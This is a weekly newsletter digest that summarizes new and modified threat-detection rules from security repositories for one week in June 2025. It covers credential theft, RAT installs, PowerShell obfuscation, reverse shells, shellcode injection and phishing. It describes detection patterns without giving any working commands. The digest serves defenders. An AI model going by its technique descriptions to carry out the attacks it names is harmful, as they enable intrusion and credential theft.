This week's update highlights the most significant changes to detection rules from 8 of the 40+ monitored GitHub repositories. Between Jun 2 and Jun 9, 2025, contributors added 67 new rules and updated 77 existing ones.

Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Key Takeaways

• New detections identify reconnaissance and initial access in cloud environments. These rules monitor for risky sign-ins via Entra ID Protection, anomalous O365 session activity, and the use of tools like BloodHound to map Azure AD. (elastic/detection-rules, splunk/security_content)

• Detections for credential access were added, targeting methods across multiple platforms. New rules spot access to browser and crypto wallet files, DPAPI key exports, registry hive dumping, and LSASS memory access. (SigmaHQ/sigma, splunk/security_content, elastic/protections-artifacts, anvilogic-forge/armory)

• Coverage for .NET-based threats was expanded to include ARM architectures. Several rules were modified to monitor 'FrameworkArm' and 'FrameworkArm64' directories for suspicious binary creation, DLL sideloading, and abuse of .NET utilities. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)

• Detections for PowerShell obfuscation and abuse were improved across several repositories. New and updated rules identify character-based obfuscation, headless execution, base64 decoding, and hidden command-line arguments. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules, elastic/protections-artifacts, SlimKQL/Hunting-Queries-Detection-Rules)

• Several repositories added detections for unauthorized Remote Access Tool (RAT) installation and execution. These rules identify service installations and processes associated with Ammy Admin, SimpleHelp, and NetSupport RAT. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules, anvilogic-forge/armory, SlimKQL/Hunting-Queries-Detection-Rules)

• Detections for Linux and macOS threats were introduced, focusing on reconnaissance, persistence, and defense evasion. These include rules for suspicious syscalls, SSH backdoors, LKM configuration, and password validation checks on macOS. (SigmaHQ/sigma, elastic/detection-rules, elastic/protections-artifacts, anvilogic-forge/armory, SlimKQL/Hunting-Queries-Detection-Rules)

• A significant number of new and modified rules focus on advanced Windows defense evasion techniques. These detections target low-level behaviors like direct syscalls, ROP gadgets, memory manipulation, and shellcode injection to bypass security controls. (elastic/protections-artifacts)

🔔 All new and modified rules in this digest are available in structured, machine-readable STIX/TAXII intelligence feeds from our partners at CTIChef.com.

Load the feeds into your SIEM, TIP, or SOAR for ready-to-use detections and to connect them directly to the threats you're already tracking.

Table Of Contents

• Corporate repositories (7)

  • splunk/security_content (✎3)

  • sublime-security/sublime-rules (+5, ✎10)

  • SigmaHQ/sigma (+25, ✎14)

  • Yamato-Security/hayabusa-rules (+16, ✎13)

  • elastic/detection-rules (+4, ✎1)

  • anvilogic-forge/armory (+2)

  • elastic/protections-artifacts (+13, ✎36)

• Personal repositories (1)

  • SlimKQL/Hunting-Queries-Detection-Rules (+2)

• Feedback

• Disclaimer

• Powered by

Corporate repositories (7)

splunk/security_content (✎3)

✎ Modified rules

The 'Concurrent Sessions from Multiple IPs' rule has been updated to include SessionId in the stats command and a new filter macro, improving detection of adversary-in-the-middle (AiTM) phishing attacks in Office 365. (O365 Concurrent Sessions From Different Ips)

The 'Internal Host Port Scanning' rule has been updated to clarify supported firewalls (e.g., Cisco Secure Firewall) and to correct the risk object to 'dest_ports', which improves accuracy when detecting reconnaissance activities. (Internal Horizontal Port Scan NMAP Top 20)

The 'Registry Hives Export via reg.exe' rule has been updated to broaden the scope of monitored registry paths, which improves detection of potential offline credential access attacks. (Windows Sensitive Registry Hive Dump Via CommandLine)

sublime-security/sublime-rules (+5, ✎10)

+ New rules

Multiple new rules expand detection of phishing attacks. These rules focus on Cloudflare CAPTCHA redirects, malformed URL prefixes used to evade scanners, HTML smuggling in calendar invites, bananaguide.com redirects, and impersonated email system notifications. The rules examine email content, attachments, and links for malicious patterns. (Suspicious attachment with unscannable Cloudflare link, Malformed URL prefix, Attachment: HTML smuggling with eval and atob via calendar invite, Open Redirect: bananaguide.com, Credential phishing: Email delivery failure impersonation)

✎ Modified rules

Rules for detecting email-based phishing attacks using images have been improved. These changes expand the coverage to identify images used in the HTML body, including those with content IDs, enhancing detection of malicious attachments and QR code lures. (Brand impersonation: Microsoft (QR code), Brand Impersonation: Fake Fax)

Detection of brand impersonation in emails has been updated. 'Sharepoint file sharing email impersonation' now spots specific text patterns and branding elements. 'Adobe brand impersonation' was improved with checks for the term "adobe," related file sharing topics, and better sender reputation analysis using time since last contact. (Brand impersonation: Sharepoint fake file share, Brand impersonation: Adobe with suspicious language and link)

Updates to rules detecting credential phishing and reconnaissance attempts refine logic for identifying suspicious emails. The 'credential phishing' rule improves handling of email addresses in disclaimers. The 'reconnaissance attempts' rule extracts and analyzes the "real subject" to ignore external warning keywords. (Credential phishing: Engaging language and other indicators (untrusted sender), Reconnaissance: All recipients cc/bcc'd or undisclosed)

Improved rules target credential theft via DocuSign and OneDrive impersonation. The DocuSign rule ignores link count when HTML is padded with whitespace and broadens detection of DocuSign Blue Box templates. The OneDrive rule includes checks for OneDrive language in attachment file names, improved link analysis, and OCR analysis of message screenshots. (Brand Impersonation: Fake DocuSign HTML table not linking to DocuSign domains, Credential phishing: Onedrive impersonation)

Rules detecting compromised GovDelivery accounts and unscannable links have been updated. The GovDelivery rule now checks if header domains have 'govdelivery.com' as the root domain and if SPF/DMARC passes. The unscannable links rule includes SSA in the list of suspicious sender display names and switches to profile.by_sender_email() to check if the sender is unsolicited. (Vendor Compromise: GovDelivery Message With Suspicious Link, Suspicious message with unscannable Cloudflare link)

🔔 We’re also posting weekly digest summaries and product updates on LinkedIn!

Follow RuleCheck.io

SigmaHQ/sigma (+25, ✎14)

+ New rules

New rules spot uncommon processes accessing sensitive browser and crypto files, plus files with patterns linked to DPAPI backup keys, which may signal credential theft attempts. (Access To Chromium Browsers Sensitive Files By Uncommon Applications, Access To Crypto Currency Wallets By Uncommon Applications, DPAPI Backup Keys And Certificate Export Activity IOC)

Several new rules track remote RPC calls for gathering event logs, task scheduling data, and potential abuse of the remote encryption service, which can expose reconnaissance and lateral movement attempts. (Remote Event Log Recon, Remote Schedule Task Recon via ITaskSchedulerService, Remote Schedule Task Lateral Movement via ITaskSchedulerService, Remote Server Service Abuse for Lateral Movement, Recon Activity via SASec)

New rules provide detection of Kubernetes deployment removals and container creations with hostPath mounts. The former is tied to potential disruptive activity, the latter to privilege escalation. (Container With A hostPath Mount Created, Deployment Deleted From Kubernetes Cluster)

New rules detect execution of Ammy Admin, service installs of remote access tools, RDP connections from suspicious locations, and executables launched from external WebDAV shares. These are often used to maintain persistence or gain initial access. (Remote Access Tool - Ammy Admin Agent Execution, Remote Access Tool Services Have Been Installed - Security, Mstsc.EXE Execution From Uncommon Parent, Suspicious External WebDAV Execution)

Two new rules monitor Linux systems for the mknod and sysinfo syscalls. The mknod syscall may indicate attempts to create backdoors, while the sysinfo syscall can mean system fingerprinting for reconnaissance. (Special File Creation via Mknod Syscall, System Info Discovery via Sysinfo Syscall)

✎ Modified rules

Expanded coverage for .NET Framework threats through updates to multiple rules. These updates include 'FrameworkArm' and 'FrameworkArm64' directories in detection logic for binary creation, DLL sideloading, AddInUtil.exe execution, aspnet_compiler.exe execution, and PowerShell DLL loading. The changes address potential dropper activities and broader .NET component locations. (Creation of an Executable by an Executable, Potential DLL Sideloading Of MsCorSvc.DLL, AddinUtil.EXE Execution From Uncommon Directory, AspNetCompiler Execution, Potentially Suspicious ASP.NET Compilation Via AspNetCompiler, PowerShell Core DLL Loaded By Non PowerShell Process)

Rules for detecting double extension file execution have been updated with broader extension coverage to better identify spear phishing attempts that disguise malicious files as documents or media. (Suspicious Double Extension Files, Suspicious Double Extension File Execution)

The detection of PowerShell obfuscation techniques is improved by adding [char]0x to the character-based obfuscation rule, enhancing coverage for defense evasion tactics. (Potential PowerShell Obfuscation Via WCHAR/CHAR)

Detection of local group enumeration on Linux systems is improved by including '/ed', '/less', '/nano', '/vi', '/vim' binaries to monitored images. This enhances visibility into adversary reconnaissance activities. (Local Groups Discovery - Linux)

Coverage improved for varied attack vectors. The 'Service Account Modification' rule now includes additional MITRE ATT ACK IDs. The 'DLL Sideloading' rule adds 'C:\Windows\SyChpe32' directory. The 'Syslog Action Clear' rule switches to syslog syscall detection. The 'Web Application Command Execution' rule incorporates execveat syscall monitoring. (Azure Kubernetes Service Account Modified or Deleted, Potential System DLL Sideloading From Non System Locations, Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall, Webshell Remote Command Execution)

Yamato-Security/hayabusa-rules (+16, ✎13)

+ New rules

New rules identify suspicious child processes of 'pc-app.exe', possibly signaling PaperCut compromise, and processes spawned by web servers (cmd.exe, powershell.exe, wscript.exe), which could indicate webshell activity or exploitation. (Suspicious Process By Web Server Process, PaperCut MF/NG Potential Exploitation)

New rules detect PowerShell commands run from a hidden ConHost window using the '--headless' flag, and command-line obfuscation that uses Unicode characters. (Powershell Executed From Headless ConHost Process, Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image)

Rules added to detect execution of 'BitLockerToGo.EXE', often abused by malware like Lumma stealer, and the Ammy Admin RMM agent. (BitLockerTogo.EXE Execution, Remote Access Tool - Ammy Admin Agent Execution)

Two rules detect the execution of the BCP utility to export data from databases. This is a technique used by attackers to extract malware saved within database columns or tables. (Data Export From MSSQL Table Via BCP.EXE, Data Export From MSSQL Table Via BCP.EXE)

Several new rules identify suspicious system activity. These include the execution of scripts using the Adobe Creative Cloud Node executable, obfuscated PowerShell installing MSI packages, DNS queries from QuickAssist.exe, suspicious RDP connections, uncommon file downloads from Microsoft domains, rogue ODBC driver registrations, and unusual files written to the Windows Fonts directory. (Node Process Executions, Obfuscated PowerShell MSI Install via WindowsInstaller COM, Obfuscated PowerShell MSI Install via WindowsInstaller COM, DNS Query Request By QuickAssist.EXE, Mstsc.EXE Execution From Uncommon Parent, Suspicious Download from Office Domain, Potentially Suspicious ODBC Driver Registered, Writing Of Malicious Files To The Fonts Folder)

✎ Modified rules

Several rules were updated to expand coverage for .NET Framework ARM and ARM64 architectures. This includes detections for AddInUtil.exe execution from non-standard directories, suspicious aspnet_compiler.exe paths, potential DLL sideloading of mscorsvc.dll, WSMAN provider use, PowerShell DLL loading by non-PowerShell processes, and executable creation. (AddinUtil.EXE Execution From Uncommon Directory, Potentially Suspicious ASP.NET Compilation Via AspNetCompiler, Potential DLL Sideloading Of MsCorSvc.DLL, Suspicious WSMAN Provider Image Loads, PowerShell Core DLL Loaded By Non PowerShell Process, Creation of an Executable by an Executable)

The rules 'Detects dropped files with double extensions', 'Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns', and 'Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns' were updated to include additional file extensions, assisting in the detection of malware abusing how Windows hides default extensions. The level on two rules was changed from critical to high. (Suspicious Double Extension Files, Suspicious Double Extension File Execution, Suspicious Double Extension File Execution)

The level for the 'Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files' rules was changed from medium to high. (File Decoded From Base64/Hex Via Certutil.EXE, File Decoded From Base64/Hex Via Certutil.EXE)

Detection for command-line obfuscation was improved. One rule now detects '[char]0x' and another detects Unicode whitespace (Braille Pattern Blank) in PowerShell_ISE. (Potential PowerShell Obfuscation Via WCHAR/CHAR, Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image)

elastic/detection-rules (+4, ✎1)

+ New rules

New rules detect user and sign-in risk events via Microsoft Entra ID Protection, which flags activities such as anonymized IP addresses, unusual travel patterns, and password spray attacks. (Entra ID Protection - Risk Detection - User Risk, Entra ID Protection - Risk Detection - Sign-in Risk)

A new rule identifies reconnaissance activity in Microsoft cloud environments through the detection of tools like AzureHound, SharpHound, and BloodHound, which are employed to map relationships within Microsoft Entra ID and Microsoft 365. (BloodHound Suite User-Agents Detected)

A new rule identifies removal of access permissions from shared AWS EC2 EBS snapshots, a tactic used to obstruct data recovery. (AWS EC2 EBS Snapshot Access Removed)

✎ Modified rules

The 'Detect LKM Configuration File Creation' rule is updated. It adds /lib/modprobe.d/* to monitored file paths. This extends coverage to additional locations where malicious Loadable Kernel Modules are configured for loading upon reboot, aiding in the detection of persistence mechanisms. (Loadable Kernel Module Configuration File Creation)

anvilogic-forge/armory (+2)

+ New rules

A new rule detects password validation checks on macOS via the dscl command, specifically when executed from unusual processes. This aims to identify potential credential testing attempts by threat actors using tools like Atomic Stealer. (Password Validation Check via DSCL from Uncommon Process - macOS)

A new rule detects installations of Windows services linked to SimpleHelp or JWrapper Remote Access tools. This identifies unauthorized remote access setups by monitoring Windows service installation events for specific binary paths. (SimpleHelp Remote Access Tool Service Installation)

elastic/protections-artifacts (+13, ✎36)

+ New rules

New rules added to detect potential SSH backdoors or post-exploitation activity, identifying the processes started after SSH login and processes spawned by SSH with unusual network connections, which may signal persistence or data exfiltration. (Unusual SSH Parent/Child Execution, Unusual SSH Child Network Connection)

Multiple rules address code injection and privilege escalation techniques. These rules focus on detecting malicious code execution through memory manipulation, kernel driver abuse, and bypassing security measures. (LSASS Memory Read via PPL Bypass, Native API Call from Unsigned Module, Process Explorer Device Access by Unusual Process, Suspicious Memory Protection Change via VirtualProtect)

Two rules new rules detect the execution of PowerShell with obfuscated content or base64 decoding, which is often seen during malware installation. (Execution via Obfuscated PowerShell Script, Suspicious PowerShell Base64 Decoding)

Several rules have been added to detect suspicious command executions or network activity. This includes detecting background task execution on Linux ('Background Task Execution via Hidden Process'), socat command usage with suspicious arguments ('Socat Command with Suspicious Arguments'), connections to AWS S3 buckets by unsigned binaries ('Outbound Connection to S3 Bucket by Unsigned Binary'), execution of scripts from a remote WebDav share ('Windows Scripts Executed from WebDav Share'), and interactive logon attempts with alternate credentials ('Interactive Logon with Alternate Credentials and Unusual Process'). (Background Task Execution via a Hidden Process, Socat Reverse Shell or Listener Activity, Suspicious Binary AWS S3 Connection, Script Execution from WebDav, Interactive Logon by a Suspicious Process)

✎ Modified rules

Several rules were updated to improve detection of suspicious process execution, persistence mechanisms, and lateral movement techniques. Updates address execution of system binaries from unusual locations (macOS and Windows), systemd process execution followed by network connections, Dynamic DNS queries by signed Microsoft binaries, network traffic tunneling, HTML application script execution, remote WMI command execution, and execution of native binaries from unusual paths during network logon sessions. The updates include new conditions, exclusions, and process hashes to reduce false positives and increase coverage. (Suspicious XPC Service Child Process, Suspicious PrivilegedHelperTool Activity, Systemd Execution Followed by Network Connection, Connection to Dynamic DNS Provider by a Signed Binary Proxy, Potential Protocol Tunneling via Legit Utilities, Script Execution via Microsoft HTML Application, Suspicious Cmd Execution via WMI, Execution of a File Dropped from SMB, Suspicious Process Execution via Network Logon, Suspicious Execution via Windows Services)

Multiple rules have been modified to refine the detection of code injection and memory manipulation techniques. These rules identify API calls and suspicious call stack patterns indicative of code injection, ROP gadgets, and attempts to evade API monitoring. Updates incorporate additional SHA256 hash exclusions, improved call stack analysis, and adjustments to address false positives related to trusted processes and system components. (LSASS Memory dump via MiniDumpWriteDump, API Call from a Process with a Spoofed Parent, API Call via Jump ROP Gadget, Image Load via Synthetic Stack Spoofing, Potential Library Load via ROP Gadgets, Direct Syscall from Unsigned Module, Potential Shellcode Injection via a WebShell, Shellcode Injection with Parent as Provenance, Execution from Suspicious Stack Trailing Bytes, Suspicious Memory Page Protection, Windows API Call via Indirect Random Syscall, Network Module Loaded from Suspicious Unbacked Memory, Remote Memory Write to Trusted Target Process)

Several rules were updated with added exclusions to reduce false positives. These rules cover a range of malicious behaviors, including parent process spoofing, persistence via registry run keys and scheduled tasks, access token manipulation, process termination via WMI, command shell execution with suspicious arguments, loading Chromium extensions from unusual parent processes, and attempts to escalate privileges. (Parent Process PID Spoofing, Suspicious Parent-Child Relationship, Potential Obfuscated Script Execution, Process Termination from an Unusual WMI Client, RunDLL32/Regsvr32 Loads Dropped Executable, Suspicious Windows Command Shell Execution, Chromium Extension Loaded from Unusual Parent, Startup Persistence from a Browser or Compression Utility Descendant, Self Service Persistence by an Unsigned Process, Suspicious Remote Process Suspend Activity, Scheduled Task Creation by an Unusual Process, Access Token Manipulation via Child Process, Privilege Escalation via SeImpersonatePrivilege)

Personal repositories (1)

SlimKQL/Hunting-Queries-Detection-Rules (+2)

+ New rules

A new rule identifies potential Ottercookie malware activity. This rule spots devices that compress data using 'tar' and then communicate with a United States-based IP address on port 1224, associated with command and control activity. The rule utilizes KQL and Microsoft Defender. (Ottercookie Detection)

A new rule identifies the execution of an obfuscated BAT dropper delivering the NetSupport RAT. The detection triggers when cmd.exe starts a .bat file, which then runs PowerShell with a hidden window, uses Invoke-WebRequest, and modifies the registry to add client32.exe to the Run key. The rule utilizes KQL and Microsoft Defender. (ANY.RUN Obfuscated BAT Dropper Delivers NetSupport RAT post)

What SIEM are you using? Tell us!

Feedback

Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have suggestions for new data sources to include, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving this resource for the detection engineering community.

Disclaimer

The summaries in this brief are generated autonomously by the OpenAI LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

Powered by

This digest is built with BlackStork.

Looking for a customized version of this newsletter? We'd be happy to help — contact us.